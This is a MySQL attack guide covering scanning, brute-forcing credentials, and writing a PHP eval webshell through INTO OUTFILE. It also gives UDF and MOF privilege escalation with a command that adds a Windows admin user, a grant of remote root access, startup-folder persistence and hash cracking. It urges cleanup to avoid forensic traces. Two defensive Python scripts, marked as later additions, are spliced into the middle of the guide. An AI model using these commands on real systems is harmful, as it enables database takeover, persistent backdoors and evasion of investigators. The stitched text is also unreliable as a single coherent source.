Comprehensive MySQL Penetration Guide: Recon, Exploits, and Privilege Escalation

This guide details systematic MySQL security testing, covering information gathering, version detection, credential extraction, webshell deployment, privilege escalation via MOF and UDF, and post‑exploitation cleanup, with concrete Metasploit, sqlmap, and nmap commands.


Author Chen Xiaobing, a senior engineer with over 18 years of network security experience, presents a thorough walkthrough of MySQL database penetration techniques commonly needed during web application attacks.

1. MySQL Information Gathering

Port scanning: Use tools like iisputter or nmap -p 3306 192.168.1.1-254 to detect the default 3306 port or custom ports.

Version detection: Metasploit module auxiliary/scanner/mysql/mysql_version (set rhosts then run) or simple SQL queries SELECT @@version, SELECT version(). Sqlmap can also retrieve version via sqlmap.py -u url --dbms mysql.

Database management tools: phpMyAdmin, Navicat, MySQL Front may store credentials in configuration files that can be harvested.

Metasploit enumeration: Modules auxiliary/scanner/mysql/mysql_hashdump and auxiliary/admin/mysql/mysql_enum retrieve password hashes, user lists, and directory information.

File and directory enumeration: Use auxiliary/scanner/mysql/mysql_file_enum and auxiliary/scanner/mysql/mysql_writable_dirs (note: success varies).

2. MySQL Password Acquisition

Brute‑force: Online web tools (Burp Suite, multi‑threaded phpMyAdmin crackers) and the Metasploit module auxiliary/scanner/mysql/mysql_login with parameters such as BLANK_PASSWORDS, BRUTEFORCE_SPEED, and PASS_FILE.

nmap scripts: nmap --script=mysql-brute 192.168.157.130 for password guessing, and nmap -sV --script=mysql-databases --script-args=mysqluser=root,mysqlpass=root 192.168.157.130 for database enumeration with known credentials.

Sqlmap OS‑shell: sqlmap -u url --os-shell to drop a webshell after gaining write access.

3. Webshell Acquisition

Leverage phpMyAdmin to read/write files via SELECT ... INTO OUTFILE (e.g., creating cmd.php with a PHP backdoor).

Directly write a one‑liner backdoor:

select '<?php @eval($_POST[antian365]);?>' INTO OUTFILE 'D:/work/WWW/antian365.php'

Use image upload tricks to embed PHP code in a JPEG and include it.

Exploit MySQL general_log to write arbitrary PHP code to a file.

Utilize CMS admin accounts (Dedecms, PHPCMS, Discuz) to upload malicious files.

4. MySQL Privilege Escalation

MOF technique: Deploy a malicious MOF file (e.g., nullevt.mof) via SELECT LOAD_FILE(...) to achieve SYSTEM level on Windows. Metasploit module exploit/windows/mysql/mysql_mof automates this.

UDF method: Upload lib_mysqludf_sys.dll to the MySQL plugin directory, create a function cmdshell, then execute commands such as select cmdshell('net user iis_user 123!@#abcABC /add');. Clean up afterwards with DROP FUNCTION cmdshell;.

Direct MySQL grant: Change the account's host to '%' or grant all privileges to a new user:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;

Startup script injection: Export VBS or BAT files to the Windows startup folder via SELECT * FROM a INTO OUTFILE 'C:\...\Startup\a.vbs'; to create persistent admin accounts.

Msf modules: exploit/windows/mysql/mysql_payload, exploit/windows/mysql/mysql_start_up, and other auxiliary scanners for authentication bypass (CVE‑2012‑2122) and privilege escalation.
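As an added defender-side example (not part of the original guide), the following Python scanner flags the statement types the guide relies on in sections 3 and 4 (INTO OUTFILE/DUMPFILE writes, UDF registration via CREATE FUNCTION ... SONAME, grants to '%', redirection of general_log, and LOAD_FILE reads) when run over a MySQL general query log. The log lines are constructed samples in the general_log file layout (time, connection id and command, then the statement); paths and names in them are placeholders.

```python
# Added example: detect the guide's attack-chain statements in a MySQL
# general query log. SAMPLE_LOG is constructed; it is not real traffic.
import re

SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z\t 12 Query\tSELECT id, name FROM products WHERE id = 7
2024-01-01T10:00:02.000000Z\t 12 Query\tselect '<?php /* constructed */ ?>' INTO OUTFILE '/var/www/html/x.php'
2024-01-01T10:00:03.000000Z\t 12 Query\tCREATE FUNCTION cmdshell RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
2024-01-01T10:00:04.000000Z\t 12 Query\tGRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'x' WITH GRANT OPTION
2024-01-01T10:00:05.000000Z\t 12 Query\tSET GLOBAL general_log_file = '/var/www/html/log.php'
2024-01-01T10:00:06.000000Z\t 13 Query\tSELECT LOAD_FILE('C:/constructed/path/secret.txt')
"""

# (label, pattern) pairs; each pattern targets one technique named in the guide.
RULES = [
    ("file write via INTO OUTFILE/DUMPFILE", re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("UDF registration", re.compile(r"\bCREATE\s+(AGGREGATE\s+)?FUNCTION\b.*\bSONAME\b", re.I)),
    ("grant to any host", re.compile(r"\bGRANT\b.*@'%'", re.I)),
    ("general_log redirected", re.compile(r"\bSET\s+GLOBAL\s+general_log(_file)?\b", re.I)),
    ("file read via LOAD_FILE", re.compile(r"\bLOAD_FILE\s*\(", re.I)),
]


def scan_general_log(text):
    """Return (connection_id, label) for every Query line matching a rule."""
    hits = []
    for line in text.splitlines():
        parts = line.split("\t")
        # Only "Query" entries carry SQL; skip headers, Connect/Quit lines, blanks.
        if len(parts) < 3 or not parts[1].strip().endswith("Query"):
            continue
        conn_id = parts[1].strip().split()[0]
        stmt = parts[2]
        for label, rx in RULES:
            if rx.search(stmt):
                hits.append((conn_id, label))
    return hits


if __name__ == "__main__":
    for conn_id, label in scan_general_log(SAMPLE_LOG):
        print(f"connection {conn_id}: {label}")
```

The general log must be enabled (and ideally shipped off-host) for this to see anything; the scanner deliberately ignores non-Query entries so a redirected log file shows up as a statement, not as noise.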

5. Password Cracking Tools

Cain & Abel: Extract MySQL hash from user.MYD and crack with dictionary or brute force.

Online hash services: cmd5.com, somd5.com for quick lookups (often paid).

Hashcat: hashcat64.exe -m 200 mysql_hash.dict for MySQL323, -m 300 for MySQL4.1/5.

John the Ripper: Use john --format=mysql-sha1 hashes.txt after preparing hash files.

6. Common Errors and Mitigations

secure_file_priv prevents SELECT ... INTO OUTFILE; the guide notes that disabling or commenting out the option in my.ini removes that block.

skip-grant-tables disables UDFs; remove the option to enable them.

File permission issues may block DLL placement; ensure the MySQL process can write to the target directory.
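As an added defender-side example (not part of the original guide), the following Python audit turns the conditions in sections 4 and 6 into checks a DBA can run against query results: an empty secure_file_priv, skip-grant-tables in the startup options, accounts reachable from '%' or holding FILE from a remote host, and any UDF registered in mysql.func. The rows below are constructed samples standing in for the output of SHOW VARIABLES, SELECT ... FROM mysql.user and SELECT ... FROM mysql.func; in practice they would be fetched from the server.

```python
# Added example: offline audit of MySQL hardening state against the
# weaknesses the guide exploits. All inputs are constructed samples.

# Rows as returned by: SELECT user, host, File_priv, Super_priv FROM mysql.user;
SAMPLE_USERS = [
    ("root", "localhost", "Y", "Y"),
    ("root", "%", "Y", "Y"),          # constructed: root reachable from any host
    ("app", "10.0.0.5", "N", "N"),
]
# Rows as returned by: SELECT name, dl FROM mysql.func;
SAMPLE_FUNCS = [("cmdshell", "lib_mysqludf_sys.dll")]  # constructed
# secure_file_priv from SHOW VARIABLES; skip_grant_tables from the
# server's startup options (my.ini / command line). Both constructed.
SAMPLE_SETTINGS = {"secure_file_priv": "", "skip_grant_tables": "OFF"}


def audit_mysql(users, funcs, settings):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    sfp = settings.get("secure_file_priv")
    if sfp == "":
        # Empty means unrestricted: INTO OUTFILE/LOAD_FILE can touch any path
        # the server process can reach (a directory value or NULL restricts it).
        findings.append("secure_file_priv is empty: file read/write is unrestricted")
    if settings.get("skip_grant_tables", "OFF") != "OFF":
        findings.append("skip_grant_tables is set: clients connect without authentication")
    for user, host, file_priv, _super_priv in users:
        if host == "%":
            findings.append(f"{user}@% accepts logins from any host")
        if file_priv == "Y" and host != "localhost":
            findings.append(f"{user}@{host} holds FILE privilege from a non-local host")
    for name, dl in funcs:
        # Any loadable function deserves review; the guide's cmdshell UDF
        # is registered exactly this way.
        findings.append(f"UDF {name} loaded from {dl}: confirm it is expected")
    return findings


if __name__ == "__main__":
    for finding in audit_mysql(SAMPLE_USERS, SAMPLE_FUNCS, SAMPLE_SETTINGS):
        print("FINDING:", finding)
```

Pair the audit with a check that the MySQL service account cannot write to plugin_dir or the web root, which closes the DLL-placement and webshell paths the guide depends on.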

All commands are presented as exact msf, nmap, sqlmap, and SQL snippets to facilitate replication in a controlled lab environment. The guide emphasizes careful cleanup: drop created functions, remove uploaded DLLs, and delete generated webshell files to avoid leaving forensic traces.
